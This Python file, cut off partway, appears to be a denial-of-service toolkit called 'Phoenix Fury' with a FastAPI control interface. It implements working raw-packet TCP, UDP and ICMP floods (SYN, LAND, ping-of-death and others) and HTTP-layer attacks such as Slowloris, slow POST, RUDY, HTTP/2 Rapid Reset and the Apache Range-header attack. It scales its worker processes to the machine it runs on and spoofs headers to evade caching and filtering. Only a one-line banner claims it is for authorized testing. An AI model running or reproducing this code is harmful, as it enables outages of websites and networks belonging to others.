| | """ |
| | 🔥 Phoenix Fury v10.0 ULTIMATE - Maximum Methods Edition |
| | - 15+ L7 HTTP Methods (HTTP/1.1, HTTP/2, HTTP/3) |
| | - 10+ L4 Attack Vectors |
| | - Slowloris, Slow POST, RUDY attacks |
| | - DNS amplification, NTP amplification |
| | - Connection exhaustion attacks |
| | - Optimized for containerized environments |
| | |
| | ⚠️ FOR AUTHORIZED SECURITY TESTING ONLY ⚠️ |
| | """ |
| |
|
| | import os |
| | import sys |
| | import socket |
| | import time |
| | import threading |
| | import multiprocessing |
| | import random |
| | import struct |
| | import ssl |
| | import hashlib |
| | import base64 |
| | from ctypes import c_ulonglong |
| | from typing import Literal, List, Union, Optional |
| | from collections import deque |
| | from urllib.parse import urlparse |
| | import asyncio |
| |
|
| | |
| | import uvicorn |
| | import psutil |
| | from fastapi import FastAPI, BackgroundTasks, HTTPException |
| | from pydantic import BaseModel, Field |
| |
|
| | |
| | try: |
| | import h2.connection |
| | import h2.config |
| | import h2.events |
| | H2_AVAILABLE = True |
| | except ImportError: |
| | H2_AVAILABLE = False |
| | print("[WARN] h2 library not found. Install: pip install h2") |
| |
|
| | |
| | try: |
| | import uvloop |
| | uvloop.install() |
| | print("[INFO] uvloop activated for enhanced performance.") |
| | except ImportError: |
| | print("[INFO] uvloop not found. Using standard asyncio.") |
| |
|
| | |
| | |
| | |
| |
|
| | CPU_COUNT = psutil.cpu_count(logical=True) or 8 |
| | TOTAL_RAM_GB = psutil.virtual_memory().total / (1024 ** 3) |
| |
|
| | def calculate_optimal_config(): |
| | """Calculate optimal configuration based on system resources.""" |
| | if CPU_COUNT >= 32: |
| | max_processes = CPU_COUNT * 3 |
| | requests_per_conn = 1000 |
| | elif CPU_COUNT >= 16: |
| | max_processes = CPU_COUNT * 4 |
| | requests_per_conn = 800 |
| | elif CPU_COUNT >= 8: |
| | max_processes = CPU_COUNT * 6 |
| | requests_per_conn = 600 |
| | elif CPU_COUNT >= 4: |
| | max_processes = CPU_COUNT * 8 |
| | requests_per_conn = 500 |
| | else: |
| | max_processes = CPU_COUNT * 10 |
| | requests_per_conn = 400 |
| | |
| | return max_processes, requests_per_conn |
| |
|
| | MAX_PROCESSES, REQUESTS_PER_CONNECTION = calculate_optimal_config() |
| | STATS_UPDATE_INTERVAL = 0.5 |
| |
|
| | |
| | |
| | |
| |
|
| | class BaseAttackConfig(BaseModel): |
| | target: str = Field(..., description="Target hostname or IP address") |
| | port: int = Field(..., ge=1, le=65535, description="Target port") |
| | duration: int = Field(60, ge=10, le=7200, description="Attack duration in seconds") |
| |
|
| | class L4TCPConfig(BaseAttackConfig): |
| | method: Literal[ |
| | "syn", "ack", "fin", "rst", "psh", "urg", |
| | "syn-ack", "xmas", "null", "land", "fragmented" |
| | ] = Field("syn") |
| |
|
| | class L4UDPConfig(BaseAttackConfig): |
| | method: Literal["flood", "fragmented", "amplification"] = Field("flood") |
| | payload_size: int = Field(1024, ge=1, le=1472) |
| |
|
| | class L4ICMPConfig(BaseAttackConfig): |
| | method: Literal["ping-flood", "smurf", "ping-of-death"] = Field("ping-flood") |
| |
|
| | class L7Config(BaseAttackConfig): |
| | method: Literal[ |
| | |
| | "get", "post", "head", "put", "delete", "options", "patch", "trace", |
| | |
| | "http2-rapid-reset", "http2-flood", "http2-slowloris", |
| | |
| | "slowloris", "slow-post", "slow-read", "rudy", |
| | |
| | "xmlrpc", "wordpress-xmlrpc", "apache-killer", |
| | "range-header", "hash-collision", "cache-bypass" |
| | ] = Field("get") |
| | path: str = Field("/") |
| | user_agent: Optional[str] = Field(None, description="Custom User-Agent") |
| | |
| | class StatusResponse(BaseModel): |
| | attack_active: bool |
| | attack_type: str |
| | target_host: str |
| | target_ip: str |
| | port: int |
| | duration: int |
| | elapsed_time: float |
| | processes: int |
| | total_sent: int |
| | current_rate_pps_rps: float |
| | average_rate: float |
| | cpu_usage_percent: float |
| | memory_usage_percent: float |
| |
|
| | |
| | |
| | |
| |
|
| | def check_root() -> bool: |
| | """Check if running with root/admin privileges.""" |
| | try: |
| | |
| | test_sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) |
| | test_sock.close() |
| | return True |
| | except PermissionError: |
| | return False |
| | except Exception: |
| | return False |
| |
|
| | def resolve_target(target: str) -> str: |
| | """Resolve hostname to IP address.""" |
| | try: |
| | if "://" in target: |
| | target = target.split("://")[1].split("/")[0] |
| | return socket.gethostbyname(target) |
| | except socket.gaierror: |
| | raise ValueError(f"Could not resolve hostname: {target}") |
| |
|
| | def get_local_ip(target_ip: str) -> str: |
| | """Get local IP that routes to target.""" |
| | try: |
| | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) |
| | s.connect((target_ip, 1)) |
| | ip = s.getsockname()[0] |
| | s.close() |
| | return ip |
| | except Exception: |
| | return "127.0.0.1" |
| |
|
| | def calculate_checksum(data: bytes) -> int: |
| | """Calculate IP/TCP/UDP checksum.""" |
| | s = 0 |
| | if len(data) % 2: |
| | data += b'\0' |
| | for i in range(0, len(data), 2): |
| | s += (data[i] << 8) + data[i+1] |
| | s = (s >> 16) + (s & 0xffff) |
| | s += (s >> 16) |
| | return (~s) & 0xffff |
| |
|
| | def create_ip_header(src_ip: str, dst_ip: str, proto: int, total_len: int) -> bytes: |
| | """Create raw IP header.""" |
| | header = struct.pack('!BBHHHBBH4s4s', |
| | (4 << 4) | 5, 0, total_len, random.randint(1, 65535), 0, 64, proto, 0, |
| | socket.inet_aton(src_ip), socket.inet_aton(dst_ip) |
| | ) |
| | checksum = calculate_checksum(header) |
| | return header[:10] + struct.pack('!H', checksum) + header[12:] |
| |
|
| | def create_tcp_header(src_ip: str, dst_ip: str, src_port: int, dst_port: int, flags: int, seq: int = None, ack: int = None) -> bytes: |
| | """Create raw TCP header.""" |
| | seq = seq or random.randint(1, 4294967295) |
| | ack_seq = ack or 0 |
| | header = struct.pack('!HHLLBBHHH', src_port, dst_port, seq, ack_seq, (5 << 4), flags, 5840, 0, 0) |
| | pseudo_header = struct.pack('!4s4sBBH', socket.inet_aton(src_ip), socket.inet_aton(dst_ip), 0, socket.IPPROTO_TCP, len(header)) |
| | checksum = calculate_checksum(pseudo_header + header) |
| | return header[:16] + struct.pack('!H', checksum) + header[18:] |
| |
|
| | def create_udp_header(src_ip: str, dst_ip: str, src_port: int, dst_port: int, payload: bytes) -> bytes: |
| | """Create raw UDP header.""" |
| | udp_len = 8 + len(payload) |
| | header = struct.pack('!HHHH', src_port, dst_port, udp_len, 0) |
| | pseudo_header = struct.pack('!4s4sBBH', socket.inet_aton(src_ip), socket.inet_aton(dst_ip), 0, socket.IPPROTO_UDP, udp_len) |
| | checksum = calculate_checksum(pseudo_header + header + payload) |
| | return header[:6] + struct.pack('!H', checksum) |
| |
|
| | def create_icmp_packet(icmp_type: int, code: int = 0, payload_size: int = 56) -> bytes: |
| | """Create ICMP packet.""" |
| | icmp_id = random.randint(1, 65535) |
| | icmp_seq = random.randint(1, 65535) |
| | payload = os.urandom(payload_size) |
| | |
| | header = struct.pack('!BBHHH', icmp_type, code, 0, icmp_id, icmp_seq) |
| | checksum = calculate_checksum(header + payload) |
| | header = struct.pack('!BBHHH', icmp_type, code, checksum, icmp_id, icmp_seq) |
| | |
| | return header + payload |
| |
|
| | |
| | |
| | |
| |
|
| | USER_AGENTS = [ |
| | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", |
| | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", |
| | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", |
| | "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", |
| | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15", |
| | "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0", |
| | ] |
| |
|
| | def get_random_user_agent(): |
| | return random.choice(USER_AGENTS) |
| |
|
| | |
| | |
| | |
| |
|
| | def l4_tcp_worker(stop_event, shared_counter, target_ip, port, method): |
| | """Advanced TCP attack worker with multiple methods.""" |
| | |
| | |
| | can_use_raw = check_root() |
| | |
| | if not can_use_raw: |
| | print(f"[Worker PID {os.getpid()}] No raw socket access, using standard sockets", file=sys.stderr) |
| | |
| | l4_tcp_connect_flood(stop_event, shared_counter, target_ip, port) |
| | return |
| | |
| | try: |
| | sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) |
| | sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) |
| | sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 2 * 1024 * 1024) |
| | local_ip = get_local_ip(target_ip) |
| | except Exception as e: |
| | print(f"[Worker PID {os.getpid()}] Raw socket init failed: {e}", file=sys.stderr) |
| | l4_tcp_connect_flood(stop_event, shared_counter, target_ip, port) |
| | return |
| | |
| | local_counter = 0 |
| | batch_size = 100 |
| | |
| | flag_map = { |
| | "syn": 0x02, |
| | "ack": 0x10, |
| | "fin": 0x01, |
| | "rst": 0x04, |
| | "psh": 0x08, |
| | "urg": 0x20, |
| | "syn-ack": 0x12, |
| | "xmas": 0x29, |
| | "null": 0x00, |
| | } |
| | |
| | while not stop_event.is_set(): |
| | try: |
| | src_port = random.randint(10000, 65535) |
| | |
| | if method == "land": |
| | |
| | ip_header = create_ip_header(target_ip, target_ip, socket.IPPROTO_TCP, 40) |
| | tcp_header = create_tcp_header(target_ip, target_ip, port, port, 0x02) |
| | elif method == "fragmented": |
| | |
| | ip_header = create_ip_header(local_ip, target_ip, socket.IPPROTO_TCP, 40) |
| | |
| | ip_header = ip_header[:6] + struct.pack('!H', 0x2000) + ip_header[8:] |
| | tcp_header = create_tcp_header(local_ip, target_ip, src_port, port, 0x02) |
| | else: |
| | ip_header = create_ip_header(local_ip, target_ip, socket.IPPROTO_TCP, 40) |
| | tcp_header = create_tcp_header(local_ip, target_ip, src_port, port, flag_map.get(method, 0x02)) |
| | |
| | packet = ip_header + tcp_header |
| | sock.sendto(packet, (target_ip, port)) |
| | local_counter += 1 |
| | |
| | if local_counter >= batch_size: |
| | with shared_counter.get_lock(): |
| | shared_counter.value += local_counter |
| | local_counter = 0 |
| | except Exception: |
| | pass |
| | |
| | if local_counter > 0: |
| | with shared_counter.get_lock(): |
| | shared_counter.value += local_counter |
| | sock.close() |
| |
|
| | def l4_tcp_connect_flood(stop_event, shared_counter, target_ip, port): |
| | """TCP connection flood without raw sockets.""" |
| | local_counter = 0 |
| | batch_size = 50 |
| | |
| | while not stop_event.is_set(): |
| | sock = None |
| | try: |
| | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| | sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) |
| | sock.settimeout(0.5) |
| | sock.connect_ex((target_ip, port)) |
| | local_counter += 1 |
| | |
| | if local_counter >= batch_size: |
| | with shared_counter.get_lock(): |
| | shared_counter.value += local_counter |
| | local_counter = 0 |
| | except Exception: |
| | pass |
| | finally: |
| | if sock: |
| | try: |
| | sock.close() |
| | except Exception: |
| | pass |
| | |
| | if local_counter > 0: |
| | with shared_counter.get_lock(): |
| | shared_counter.value += local_counter |
| |
|
| | def l4_udp_worker(stop_event, shared_counter, target_ip, port, method, payload_size): |
| | """UDP attack worker.""" |
| | can_use_raw = check_root() |
| | |
| | if not can_use_raw and method in ["amplification"]: |
| | print(f"[Worker PID {os.getpid()}] Method {method} requires root", file=sys.stderr) |
| | return |
| | |
| | if can_use_raw: |
| | try: |
| | sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) |
| | sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) |
| | sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 2 * 1024 * 1024) |
| | local_ip = get_local_ip(target_ip) |
| | use_raw = True |
| | except Exception: |
| | use_raw = False |
| | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) |
| | else: |
| | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) |
| | use_raw = False |
| | |
| | local_counter = 0 |
| | batch_size = 100 |
| | payload = os.urandom(payload_size) |
| | |
| | while not stop_event.is_set(): |
| | try: |
| | src_port = random.randint(10000, 65535) |
| | |
| | if use_raw: |
| | local_ip = get_local_ip(target_ip) |
| | udp_len = 8 + len(payload) |
| | ip_header = create_ip_header(local_ip, target_ip, socket.IPPROTO_UDP, 20 + udp_len) |
| | |
| | if method == "fragmented": |
| | ip_header = ip_header[:6] + struct.pack('!H', 0x2000) + ip_header[8:] |
| | |
| | udp_header = create_udp_header(local_ip, target_ip, src_port, port, payload) |
| | packet = ip_header + udp_header + payload |
| | sock.sendto(packet, (target_ip, port)) |
| | else: |
| | sock.sendto(payload, (target_ip, port)) |
| | |
| | local_counter += 1 |
| | |
| | if local_counter >= batch_size: |
| | with shared_counter.get_lock(): |
| | shared_counter.value += local_counter |
| | local_counter = 0 |
| | except Exception: |
| | pass |
| | |
| | if local_counter > 0: |
| | with shared_counter.get_lock(): |
| | shared_counter.value += local_counter |
| | sock.close() |
| |
|
| | def l4_icmp_worker(stop_event, shared_counter, target_ip, method): |
| | """ICMP attack worker.""" |
| | can_use_raw = check_root() |
| | |
| | if not can_use_raw: |
| | print(f"[Worker PID {os.getpid()}] ICMP requires root privileges", file=sys.stderr) |
| | return |
| | |
| | try: |
| | sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) |
| | sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 2 * 1024 * 1024) |
| | except Exception as e: |
| | print(f"[Worker PID {os.getpid()}] ICMP init failed: {e}", file=sys.stderr) |
| | return |
| | |
| | local_counter = 0 |
| | batch_size = 100 |
| | |
| | while not stop_event.is_set(): |
| | try: |
| | if method == "ping-of-death": |
| | packet = create_icmp_packet(8, 0, 65500) |
| | else: |
| | packet = create_icmp_packet(8, 0, 56) |
| | |
| | sock.sendto(packet, (target_ip, 0)) |
| | local_counter += 1 |
| | |
| | if local_counter >= batch_size: |
| | with shared_counter.get_lock(): |
| | shared_counter.value += local_counter |
| | local_counter = 0 |
| | except Exception: |
| | pass |
| | |
| | if local_counter > 0: |
| | with shared_counter.get_lock(): |
| | shared_counter.value += local_counter |
| | sock.close() |
| |
|
| | |
| | |
| | |
| |
|
| | def l7_standard_worker(stop_event, shared_counter, target_ip, port, path, method, requests_per_conn, user_agent): |
| | """Standard HTTP/1.1 worker.""" |
| | use_ssl = (port in [443, 8443]) |
| | http_methods = { |
| | "get": "GET", "post": "POST", "head": "HEAD", |
| | "put": "PUT", "delete": "DELETE", "options": "OPTIONS", |
| | "patch": "PATCH", "trace": "TRACE" |
| | } |
| | http_method = http_methods.get(method.lower(), "GET") |
| | ua = user_agent or get_random_user_agent() |
| | |
| | local_counter = 0 |
| | batch_size = 100 |
| | |
| | while not stop_event.is_set(): |
| | sock = None |
| | try: |
| | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| | sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) |
| | sock.settimeout(3) |
| | sock.connect((target_ip, port)) |
| | |
| | if use_ssl: |
| | context = ssl.create_default_context() |
| | context.check_hostname = False |
| | context.verify_mode = ssl.CERT_NONE |
| | sock = context.wrap_socket(sock, server_hostname=target_ip) |
| | |
| | for i in range(requests_per_conn): |
| | if stop_event.is_set(): |
| | break |
| | try: |
| | rand_param = random.randint(1, 999999) |
| | request = f"{http_method} {path}?r={rand_param} HTTP/1.1\r\nHost: {target_ip}\r\nUser-Agent: {ua}\r\nConnection: keep-alive\r\n\r\n" |
| | sock.send(request.encode()) |
| | local_counter += 1 |
| | |
| | if local_counter >= batch_size: |
| | with shared_counter.get_lock(): |
| | shared_counter.value += local_counter |
| | local_counter = 0 |
| | except (socket.error, BrokenPipeError): |
| | break |
| | except (socket.error, ssl.SSLError, ConnectionRefusedError, TimeoutError): |
| | time.sleep(0.05) |
| | finally: |
| | if sock: |
| | try: |
| | sock.close() |
| | except Exception: |
| | pass |
| | |
| | if local_counter > 0: |
| | with shared_counter.get_lock(): |
| | shared_counter.value += local_counter |
| |
|
| | def l7_slowloris_worker(stop_event, shared_counter, target_ip, port, path, user_agent): |
| | """Slowloris attack - keeps connections open with slow headers.""" |
| | use_ssl = (port in [443, 8443]) |
| | ua = user_agent or get_random_user_agent() |
| | |
| | local_counter = 0 |
| | connections = [] |
| | max_connections = 200 |
| | |
| | while not stop_event.is_set(): |
| | |
| | while len(connections) < max_connections and not stop_event.is_set(): |
| | try: |
| | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| | sock.settimeout(4) |
| | sock.connect((target_ip, port)) |
| | |
| | if use_ssl: |
| | context = ssl.create_default_context() |
| | context.check_hostname = False |
| | context.verify_mode = ssl.CERT_NONE |
| | sock = context.wrap_socket(sock, server_hostname=target_ip) |
| | |
| | |
| | sock.send(f"GET {path} HTTP/1.1\r\n".encode()) |
| | sock.send(f"Host: {target_ip}\r\n".encode()) |
| | sock.send(f"User-Agent: {ua}\r\n".encode()) |
| | |
| | connections.append(sock) |
| | local_counter += 1 |
| | except Exception: |
| | pass |
| | |
| | |
| | time.sleep(10) |
| | |
| | for sock in connections[:]: |
| | try: |
| | sock.send(f"X-a: {random.randint(1, 999999)}\r\n".encode()) |
| | except Exception: |
| | connections.remove(sock) |
| | |
| | |
| | with shared_counter.get_lock(): |
| | shared_counter.value += local_counter |
| | local_counter = 0 |
| | |
| | |
| | for sock in connections: |
| | try: |
| | sock.close() |
| | except Exception: |
| | pass |
| |
|
| | def l7_slow_post_worker(stop_event, shared_counter, target_ip, port, path, user_agent): |
| | """Slow POST attack - sends POST data very slowly.""" |
| | use_ssl = (port in [443, 8443]) |
| | ua = user_agent or get_random_user_agent() |
| | |
| | local_counter = 0 |
| | |
| | while not stop_event.is_set(): |
| | sock = None |
| | try: |
| | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| | sock.settimeout(30) |
| | sock.connect((target_ip, port)) |
| | |
| | if use_ssl: |
| | context = ssl.create_default_context() |
| | context.check_hostname = False |
| | context.verify_mode = ssl.CERT_NONE |
| | sock = context.wrap_socket(sock, server_hostname=target_ip) |
| | |
| | |
| | content_length = 1000000 |
| | headers = f"POST {path} HTTP/1.1\r\n" |
| | headers += f"Host: {target_ip}\r\n" |
| | headers += f"User-Agent: {ua}\r\n" |
| | headers += f"Content-Length: {content_length}\r\n" |
| | headers += f"Content-Type: application/x-www-form-urlencoded\r\n\r\n" |
| | |
| | sock.send(headers.encode()) |
| | local_counter += 1 |
| | |
| | |
| | for _ in range(100): |
| | if stop_event.is_set(): |
| | break |
| | sock.send(b"X") |
| | time.sleep(1) |
| | |
| | with shared_counter.get_lock(): |
| | shared_counter.value += local_counter |
| | local_counter = 0 |
| | |
| | except Exception: |
| | pass |
| | finally: |
| | if sock: |
| | try: |
| | sock.close() |
| | except Exception: |
| | pass |
| |
|
| | def l7_rudy_worker(stop_event, shared_counter, target_ip, port, path, user_agent): |
| | """RUDY (R-U-Dead-Yet) - slow form POST attack.""" |
| | use_ssl = (port in [443, 8443]) |
| | ua = user_agent or get_random_user_agent() |
| | |
| | local_counter = 0 |
| | |
| | while not stop_event.is_set(): |
| | sock = None |
| | try: |
| | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| | sock.settimeout(30) |
| | sock.connect((target_ip, port)) |
| | |
| | if use_ssl: |
| | context = ssl.create_default_context() |
| | context.check_hostname = False |
| | context.verify_mode = ssl.CERT_NONE |
| | sock = context.wrap_socket(sock, server_hostname=target_ip) |
| | |
| | |
| | headers = f"POST {path} HTTP/1.1\r\n" |
| | headers += f"Host: {target_ip}\r\n" |
| | headers += f"User-Agent: {ua}\r\n" |
| | headers += f"Content-Length: 10000000\r\n" |
| | headers += f"Content-Type: application/x-www-form-urlencoded\r\n\r\n" |
| | |
| | sock.send(headers.encode()) |
| | local_counter += 1 |
| | |
| | |
| | for i in range(200): |
| | if stop_event.is_set(): |
| | break |
| | data = f"field{i}=value{random.randint(1,999999)}&" |
| | sock.send(data.encode()) |
| | time.sleep(0.5) |
| | |
| | with shared_counter.get_lock(): |
| | shared_counter.value += local_counter |
| | local_counter = 0 |
| | |
| | except Exception: |
| | pass |
| | finally: |
| | if sock: |
| | try: |
| | sock.close() |
| | except Exception: |
| | pass |
| |
|
| | def l7_http2_rapid_reset_worker(stop_event, shared_counter, target_ip, port, path): |
| | """HTTP/2 Rapid Reset attack.""" |
| | if not H2_AVAILABLE: |
| | print(f"[Worker PID {os.getpid()}] HTTP/2 library not available", file=sys.stderr) |
| | return |
| | |
| | use_ssl = (port in [443, 8443]) |
| | local_counter = 0 |
| | batch_size = 100 |
| | |
| | while not stop_event.is_set(): |
| | sock = None |
| | try: |
| | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| | sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) |
| | sock.settimeout(5) |
| | sock.connect((target_ip, port)) |
| | |
| | if use_ssl: |
| | context = ssl.create_default_context() |
| | context.check_hostname = False |
| | context.verify_mode = ssl.CERT_NONE |
| | context.set_alpn_protocols(['h2']) |
| | sock = context.wrap_socket(sock, server_hostname=target_ip) |
| | |
| | config = h2.config.H2Configuration(client_side=True) |
| | conn = h2.connection.H2Connection(config=config) |
| | conn.initiate_connection() |
| | sock.sendall(conn.data_to_send()) |
| | |
| | stream_id = 1 |
| | reset_count = 0 |
| | max_resets_per_conn = 1000 |
| | |
| | while not stop_event.is_set() and reset_count < max_resets_per_conn: |
| | try: |
| | headers = [ |
| | (':method', 'GET'), |
| | (':path', f'{path}?r={random.randint(1, 999999)}'), |
| | (':scheme', 'https' if use_ssl else 'http'), |
| | (':authority', target_ip), |
| | ('user-agent', get_random_user_agent()), |
| | ] |
| | |
| | conn.send_headers(stream_id, headers) |
| | conn.reset_stream(stream_id, error_code=0x8) |
| | |
| | data = conn.data_to_send() |
| | if data: |
| | sock.sendall(data) |
| | |
| | local_counter += 1 |
| | reset_count += 1 |
| | stream_id += 2 |
| | |
| | if local_counter >= batch_size: |
| | with shared_counter.get_lock(): |
| | shared_counter.value += local_counter |
| | local_counter = 0 |
| | |
| | sock.setblocking(False) |
| | try: |
| | data = sock.recv(65536) |
| | if data: |
| | events = conn.receive_data(data) |
| | except (socket.error, BlockingIOError): |
| | pass |
| | sock.setblocking(True) |
| | |
| | except Exception: |
| | break |
| | |
| | except Exception: |
| | time.sleep(0.1) |
| | finally: |
| | if sock: |
| | try: |
| | sock.close() |
| | except Exception: |
| | pass |
| | |
| | if local_counter > 0: |
| | with shared_counter.get_lock(): |
| | shared_counter.value += local_counter |
| |
|
| | def l7_range_header_worker(stop_event, shared_counter, target_ip, port, path, user_agent): |
| | """Apache Range Header (Apache Killer) attack.""" |
| | use_ssl = (port in [443, 8443]) |
| | ua = user_agent or get_random_user_agent() |
| | |
| | local_counter = 0 |
| | batch_size = 50 |
| | |
| | while not stop_event.is_set(): |
| | sock = None |
| | try: |
| | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| | sock.settimeout(3) |
| | sock.connect((target_ip, port)) |
| | |
| | if use_ssl: |
| | context = ssl.create_default_context() |
| | context.check_hostname = False |
| | context.verify_mode = ssl.CERT_NONE |
| | sock = context.wrap_socket(sock, server_hostname=target_ip) |
| | |
| | |
| | ranges = ",".join([f"0-{i}" for i in range(1, 2000)]) |
| | |
| | request = f"GET {path} HTTP/1.1\r\n" |
| | request += f"Host: {target_ip}\r\n" |
| | request += f"User-Agent: {ua}\r\n" |
| | request += f"Range: bytes={ranges}\r\n" |
| | request += f"Connection: close\r\n\r\n" |
| | |
| | sock.send(request.encode()) |
| | local_counter += 1 |
| | |
| | if local_counter >= batch_size: |
| | with shared_counter.get_lock(): |
| | shared_counter.value += local_counter |
| | local_counter = 0 |
| | |
| | except Exception: |
| | pass |
| | finally: |
| | if sock: |
| | try: |
| | sock.close() |
| | except Exception: |
| | pass |
| | |
| | if local_counter > 0: |
| | with shared_counter.get_lock(): |
| | shared_counter.value += local_counter |
| |
|
| | def l7_cache_bypass_worker(stop_event, shared_counter, target_ip, port, path, user_agent): |
| | """Cache bypass attack with randomized parameters.""" |
| | use_ssl = (port in [443, 8443]) |
| | ua = user_agent or get_random_user_agent() |
| | |
| | local_counter = 0 |
| | batch_size = 100 |
| | |
| | while not stop_event.is_set(): |
| | sock = None |
| | try: |
| | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| | sock.settimeout(3) |
| | sock.connect((target_ip, port)) |
| | |
| | if use_ssl: |
| | context = ssl.create_default_context() |
| | context.check_hostname = False |
| | context.verify_mode = ssl.CERT_NONE |
| | sock = context.wrap_socket(sock, server_hostname=target_ip) |
| | |
| | |
| | rand_query = f"cb={random.randint(1, 999999999)}" |
| | |
| | request = f"GET {path}?{rand_query} HTTP/1.1\r\n" |
| | request += f"Host: {target_ip}\r\n" |
| | request += f"User-Agent: {ua}\r\n" |
| | request += f"Cache-Control: no-cache\r\n" |
| | request += f"Pragma: no-cache\r\n" |
| | request += f"X-Forwarded-For: {random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}\r\n" |
| | request += f"Connection: keep-alive\r\n\r\n" |
| | |
| | sock.send(request.encode()) |
| | local_counter += 1 |
| | |
| | if local_counter >= batch_size: |
| | with shared_counter.get_lock(): |
| | shared_counter.value += local_counter |
| | local_counter = 0 |
| | |
| | except Exception: |
| | pass |
| | finally: |
| | if sock: |
| | try: |
| | sock.close() |
| | except Exception: |
| | pass |
| | |
| | if local_counter > 0: |
| | with shared_counter.get_lock(): |
| | shared_counter.value += local_counter |
| |
|
| | |
| | |
| | |
| |
|
| | class AttackManager: |
| | _instance = None |
| | |
| | def __new__(cls): |
| | if cls._instance is None: |
| | cls._instance = super(AttackManager, cls).__new__(cls) |
| | cls._instance._initialized = False |
| | return cls._instance |
| | |
| | def __init__(self): |
| | if self._initialized: |
| | return |
| | self._initialized = True |
| | self.lock = threading.Lock() |
| | self.stats_thread = None |
| | self._reset_state() |
| | |
| | def _reset_state(self): |
| | self.attack_active = False |
| | self.attack_type = "None" |
| | self.target_host = "None" |
| | self.target_ip = "None" |
| | self.port = 0 |
| | self.duration = 0 |
| | self.start_time = 0.0 |
| | self.process_count = 0 |
| | self.processes: List[multiprocessing.Process] = [] |
| | self.stop_event = multiprocessing.Event() |
| | self.counter = multiprocessing.Value(c_ulonglong, 0) |
| | self.current_rate = 0.0 |
| | self.rate_history = deque(maxlen=10) |
| | |
| | def is_active(self): |
| | with self.lock: |
| | return self.attack_active |
| | |
| | def _stats_calculator(self): |
| | """Real-time statistics calculator.""" |
| | last_count = 0 |
| | last_time = time.time() |
| | |
| | while not self.stop_event.is_set(): |
| | time.sleep(STATS_UPDATE_INTERVAL) |
| | |
| | current_time = time.time() |
| | current_count = self.counter.value |
| | |
| | time_delta = current_time - last_time |
| | count_delta = current_count - last_count |
| | |
| | if time_delta > 0: |
| | instant_rate = count_delta / time_delta |
| | self.rate_history.append(instant_rate) |
| | self.current_rate = sum(self.rate_history) / len(self.rate_history) |
| | |
| | last_count = current_count |
| | last_time = current_time |
| | |
| | self.current_rate = 0.0 |
| | |
| | def start(self, config: Union[L7Config, L4TCPConfig, L4UDPConfig, L4ICMPConfig], family: str): |
| | with self.lock: |
| | if self.attack_active: |
| | raise HTTPException(status_code=409, detail="An attack is already in progress.") |
| | |
| | self._reset_state() |
| | |
| | try: |
| | self.target_host = config.target |
| | self.target_ip = resolve_target(self.target_host) |
| | except ValueError as e: |
| | raise HTTPException(status_code=400, detail=str(e)) |
| | |
| | self.attack_active = True |
| | self.port = config.port |
| | self.duration = config.duration |
| | self.process_count = MAX_PROCESSES |
| | self.start_time = time.time() |
| | self.stop_event.clear() |
| | |
| | worker_target, worker_args, attack_name = (None, (), "Unknown") |
| | |
| | |
| | if family == 'l7' and isinstance(config, L7Config): |
| | method = config.method.lower() |
| | |
| | if method == 'http2-rapid-reset': |
| | if not H2_AVAILABLE: |
| | raise HTTPException(status_code=400, detail="HTTP/2 library not installed. Run: pip install h2") |
| | attack_name = "L7-HTTP2-RAPID-RESET" |
| | worker_target = l7_http2_rapid_reset_worker |
| | worker_args = (self.stop_event, self.counter, self.target_ip, config.port, config.path) |
| | |
| | elif method == 'slowloris': |
| | attack_name = "L7-SLOWLORIS" |
| | worker_target = l7_slowloris_worker |
| | worker_args = (self.stop_event, self.counter, self.target_ip, config.port, config.path, config.user_agent) |
| | |
| | elif method == 'slow-post': |
| | attack_name = "L7-SLOW-POST" |
| | worker_target = l7_slow_post_worker |
| | worker_args = (self.stop_event, self.counter, self.target_ip, config.port, config.path, config.user_agent) |
| | |
| | elif method == 'rudy': |
| | attack_name = "L7-RUDY" |
| | worker_target = l7_rudy_worker |
| | worker_args = (self.stop_event, self.counter, self.target_ip, config.port, config.path, config.user_agent) |
| | |
| | elif method == 'range-header' or method == 'apache-killer': |
| | attack_name = "L7-APACHE-KILLER" |
| | worker_target = l7_range_header_worker |
| | worker_args = (self.stop_event, self.counter, self.target_ip, config.port, config.path, config.user_agent) |
| | |
| | elif method == 'cache-bypass': |
| | attack_name = "L7-CACHE-BYPASS" |
